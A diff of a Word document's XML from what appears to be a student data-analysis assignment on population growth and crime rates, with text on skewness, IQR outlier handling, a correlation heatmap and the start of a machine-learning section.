-                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
-                        <a:prstTxWarp prst="textNoShape">
-                          <a:avLst/>
-                        </a:prstTxWarp>
-                        <a:noAutofit/>
-                      </wps:bodyPr>
-                    </wps:wsp>
-                  </a:graphicData>
-                </a:graphic>
-                <wp14:sizeRelH relativeFrom="margin">
-                  <wp14:pctWidth>0</wp14:pctWidth>
-                </wp14:sizeRelH>
-                <wp14:sizeRelV relativeFrom="margin">
-                  <wp14:pctHeight>0</wp14:pctHeight>
-                </wp14:sizeRelV>
-              </wp:anchor>
-            </w:drawing>
-          </mc:Choice>
-          <mc:Fallback>
-            <w:pict>
-              <v:shape w14:anchorId="3F811877" id="Text Box 1" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:243.75pt;margin-top:95.45pt;width:203pt;height:186.5pt;z-index:251669504;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" fillcolor="white [3201]" strokeweight=".5pt">
-                <v:textbox>
-                  <w:txbxContent>
-                    <w:p>
-                      <w:pPr>
-                        <w:pStyle w:val="BodyA"/>
-                        <w:jc w:val="center"/>
-                        <w:rPr>
-                          <w:b/>
-                          <w:bCs/>
-                        </w:rPr>
-                      </w:pPr>
-                      <w:r>
-                        <w:rPr>
-                          <w:b/>
-                          <w:bCs/>
-                        </w:rPr>
-                        <w:t>Skewness vs outliers:</w:t>
-                      </w:r>
-                    </w:p>
-                    <w:p>
-                      <w:pPr>
-                        <w:jc w:val="both"/>
-                      </w:pPr>
-                      <w:r>
-                        <w:t>As a result, we have 19 skewed columns, with some right skewness and others left skewness.</w:t>
-                      </w:r>
-                      <w:r>
-                        <w:t xml:space="preserve"> Also, we can observe that there are 15 </w:t>
-                      </w:r>
-                      <w:proofErr w:type="spellStart"/>
-                      <w:r>
-                        <w:t>rowns</w:t>
-                      </w:r>
-                      <w:proofErr w:type="spellEnd"/>
-                      <w:r>
-                        <w:t xml:space="preserve"> with outliers.</w:t>
-                      </w:r>
-                    </w:p>
-                    <w:p>
-                      <w:pPr>
-                        <w:jc w:val="both"/>
-                        <w:rPr>
-                          <w:lang w:val="en-US"/>
-                        </w:rPr>
-                      </w:pPr>
-                      <w:r>
-                        <w:t xml:space="preserve">Considering that the </w:t>
-                      </w:r>
-                      <w:proofErr w:type="spellStart"/>
-                      <w:r>
-                        <w:t>dataframe</w:t>
-                      </w:r>
-                      <w:proofErr w:type="spellEnd"/>
-                      <w:r>
-                        <w:t xml:space="preserve"> contains 21 rows, removing outliers would eliminat</w:t>
-                      </w:r>
-                      <w:r>
-                        <w:t>e</w:t>
-                      </w:r>
-                      <w:r>
-                        <w:t xml:space="preserve"> 15 rows. In this scenario, the preferred approach is </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:t>transform</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:t xml:space="preserve"> the data to mitigate skewness rather than removing outliers.</w:t>
-                      </w:r>
-                    </w:p>
-                  </w:txbxContent>
-                </v:textbox>
-              </v:shape>
-            </w:pict>
-          </mc:Fallback>
-        </mc:AlternateContent>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <mc:AlternateContent>
-          <mc:Choice Requires="wps">
-            <w:drawing>
-              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1EDE23F9" wp14:editId="5C0B9F49">
-                <wp:simplePos x="0" y="0"/>
-                <wp:positionH relativeFrom="margin">
-                  <wp:align>right</wp:align>
-                </wp:positionH>
-                <wp:positionV relativeFrom="paragraph">
-                  <wp:posOffset>613410</wp:posOffset>
-                </wp:positionV>
-                <wp:extent cx="6064250" cy="3505200"/>
-                <wp:effectExtent l="0" t="0" r="12700" b="19050"/>
-                <wp:wrapTopAndBottom/>
-                <wp:docPr id="894842312" name="Text Box 2"/>
+                <wp:extent cx="2576195" cy="2195195"/>
+                <wp:effectExtent l="0" t="0" r="14605" b="14605"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="808723846" name="Text Box 2"/>
                 <wp:cNvGraphicFramePr>
                   <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
                 </wp:cNvGraphicFramePr>
@@ -11750,7 +10926,7 @@
                       <wps:spPr bwMode="auto">
                         <a:xfrm>
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6064250" cy="3505200"/>
+                          <a:ext cx="2576195" cy="2195195"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -11771,47 +10947,33 @@
                         <w:txbxContent>
                           <w:p>
                             <w:pPr>
-                              <w:pStyle w:val="BodyA"/>
+                              <w:jc w:val="center"/>
+                              <w:rPr>
+                                <w:b/>
+                                <w:bCs/>
+                              </w:rPr>
                             </w:pPr>
                             <w:r>
                               <w:rPr>
-                                <w:noProof/>
+                                <w:b/>
+                                <w:bCs/>
                               </w:rPr>
-                              <w:drawing>
-                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60B3B3C9" wp14:editId="319D97DD">
-                                  <wp:extent cx="2402541" cy="3074564"/>
-                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                                  <wp:docPr id="1685088419" name="Picture 1" descr="A screenshot of a data&#10;&#10;Description automatically generated"/>
-                                  <wp:cNvGraphicFramePr>
-                                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                                  </wp:cNvGraphicFramePr>
-                                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                                        <pic:nvPicPr>
-                                          <pic:cNvPr id="1685088419" name="Picture 1" descr="A screenshot of a data&#10;&#10;Description automatically generated"/>
-                                          <pic:cNvPicPr/>
-                                        </pic:nvPicPr>
-                                        <pic:blipFill>
-                                          <a:blip r:embed="rId27"/>
-                                          <a:stretch>
-                                            <a:fillRect/>
-                                          </a:stretch>
-                                        </pic:blipFill>
-                                        <pic:spPr>
-                                          <a:xfrm>
-                                            <a:off x="0" y="0"/>
-                                            <a:ext cx="2407230" cy="3080565"/>
-                                          </a:xfrm>
-                                          <a:prstGeom prst="rect">
-                                            <a:avLst/>
-                                          </a:prstGeom>
-                                        </pic:spPr>
-                                      </pic:pic>
-                                    </a:graphicData>
-                                  </a:graphic>
-                                </wp:inline>
-                              </w:drawing>
+                              <w:t>Insight</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:bCs/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> from Correlation Heatmap</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="both"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>The correlation coefficient for the population growth and crime rate dataset is --0.582652. This indicates a moderate negative correlation between the two variables. This means that as the population increases, the crime rate tends to decrease.</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -11833,7 +10995,564 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape w14:anchorId="1EDE23F9" id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;margin-left:426.3pt;margin-top:48.3pt;width:477.5pt;height:276pt;z-index:-251648000;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:right;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+              <v:shape w14:anchorId="4A5DC8E0" id="_x0000_s1029" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:253.05pt;margin-top:8.25pt;width:202.85pt;height:172.85pt;z-index:251679744;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="center"/>
+                        <w:rPr>
+                          <w:b/>
+                          <w:bCs/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:bCs/>
+                        </w:rPr>
+                        <w:t>Insight</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:bCs/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> from Correlation Heatmap</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="both"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>The correlation coefficient for the population growth and crime rate dataset is --0.582652. This indicates a moderate negative correlation between the two variables. This means that as the population increases, the crime rate tends to decrease.</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F570F7C" wp14:editId="3219711C">
+            <wp:extent cx="2652712" cy="2402178"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1402812118" name="Picture 1" descr="A screenshot of a graph&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1402812118" name="Picture 1" descr="A screenshot of a graph&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId26"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2659744" cy="2408546"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t>Figure 08 – Heatmap correlation coefficient popula</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t>ti</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t>on and crime</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="5" w:name="_Toc59959352"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:color="000000"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:color="000000"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve">3.0 </w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="5"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:color="000000"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>Machine Learning for Data Analysis</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:rPr>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t>For the purpose of developing a machine learning model, I will utilize the new generated dataset, Pop_and_crime_df.csv. To prepare the data for Machine Learning, I will standardize the crime rate providing the crime rate per 100,000 people, which is a common way to standardize crime rates for comparison.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">These tasks will be performed in the jupyter notebook: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>MSC_DA_CA1_Jose_Mario</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.ipynb</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t>Phase 4 - Machine Learning</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Handling Outliers</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Skewness</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>In the Machine Learning phase, it is crucial to address skewness, handle outliers, and standardize the data.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">To identify potential outliers, statistical methods like the Z-score or the Interquartile Range (IQR) can be employed. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Considering that this dataset is highly skewed, the IQR method is the more appropriate choice for identifying potential outliers.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>After applying the IQR method, we have a table with the rows with outliers:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D089CB7" wp14:editId="22CC76FD">
+            <wp:extent cx="6120130" cy="2139950"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1484570252" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1484570252" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId27"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6120130" cy="2139950"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+      <w:r>
+        <w:t>or skewness, a</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">s we have more columns, I've implemented a </w:t>
+      </w:r>
+      <w:r>
+        <w:t>“F</w:t>
+      </w:r>
+      <w:r>
+        <w:t>or</w:t>
+      </w:r>
+      <w:r>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> loop to identify and print the skewness only when it exceeds the threshold.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1EDE23F9" wp14:editId="79B04B57">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="margin">
+                  <wp:align>left</wp:align>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>109855</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="2647950" cy="1495425"/>
+                <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="894842312" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="2647950" cy="1495425"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:ln>
+                          <a:noFill/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:style>
+                        <a:lnRef idx="2">
+                          <a:schemeClr val="dk1"/>
+                        </a:lnRef>
+                        <a:fillRef idx="1">
+                          <a:schemeClr val="lt1"/>
+                        </a:fillRef>
+                        <a:effectRef idx="0">
+                          <a:schemeClr val="dk1"/>
+                        </a:effectRef>
+                        <a:fontRef idx="minor">
+                          <a:schemeClr val="dk1"/>
+                        </a:fontRef>
+                      </wps:style>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="BodyA"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:br/>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:noProof/>
+                              </w:rPr>
+                              <w:drawing>
+                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14FCE9DE" wp14:editId="68DAF72A">
+                                  <wp:extent cx="2548034" cy="909637"/>
+                                  <wp:effectExtent l="0" t="0" r="5080" b="5080"/>
+                                  <wp:docPr id="47217360" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
+                                  <wp:cNvGraphicFramePr>
+                                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                                  </wp:cNvGraphicFramePr>
+                                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                        <pic:nvPicPr>
+                                          <pic:cNvPr id="47217360" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
+                                          <pic:cNvPicPr/>
+                                        </pic:nvPicPr>
+                                        <pic:blipFill>
+                                          <a:blip r:embed="rId28"/>
+                                          <a:stretch>
+                                            <a:fillRect/>
+                                          </a:stretch>
+                                        </pic:blipFill>
+                                        <pic:spPr>
+                                          <a:xfrm>
+                                            <a:off x="0" y="0"/>
+                                            <a:ext cx="2590814" cy="924909"/>
+                                          </a:xfrm>
+                                          <a:prstGeom prst="rect">
+                                            <a:avLst/>
+                                          </a:prstGeom>
+                                        </pic:spPr>
+                                      </pic:pic>
+                                    </a:graphicData>
+                                  </a:graphic>
+                                </wp:inline>
+                              </w:drawing>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="BodyA"/>
+                            </w:pPr>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="1EDE23F9" id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:8.65pt;width:208.5pt;height:117.75pt;z-index:-251648000;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" fillcolor="white [3201]" stroked="f" strokeweight="1pt">
                 <v:textbox>
                   <w:txbxContent>
                     <w:p>
@@ -11841,14 +11560,17 @@
                         <w:pStyle w:val="BodyA"/>
                       </w:pPr>
                       <w:r>
